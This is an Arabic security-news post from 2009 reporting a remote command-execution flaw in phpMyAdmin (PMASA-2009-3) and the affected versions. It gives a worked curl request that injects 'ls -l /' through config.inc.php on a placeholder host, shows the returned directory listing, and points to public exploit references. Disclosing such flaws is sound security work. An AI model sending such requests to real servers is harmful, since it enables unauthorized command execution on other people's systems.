| ثغرة في phpMyAdmin تتيح تنفيذ أوامر عن بعد |
| الكاتب باحث عن المعرفة |
| الخميس, 25 يونيو 2009 14:51 |
|
انتشر مؤخراً كود يستغل ثغرة في سكريبت ادارة قواعد البيانات phpMyAdmin تتيح للمهاجم حقن كود في ملف config.php يساعد المهاجم في تنفيذ أوامر على النظام عن بعد. اكتشفت الثغرة ووضع تحديث لها في مارس 2009 نشرة PMASA-2009-3 وهي موجودة في الاصدارات ما قبل 2.11.9.5 وما قبل 3.1.3.1 من سكريبت phpMyAdmin.
مثال لاستغلال الثغرة: $ curl "http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"total 96drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd [...]
للاطلاع على الاستغلال ولمزيد من المعلومات: GNUCITIZEN - Milw0rm-8921 عن الكاتب:
إضافة إلى المفضلة
مشاركة
إرسال إلى صديق
المشاهدات: 826 التعليقات (0)
![]() أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول. |






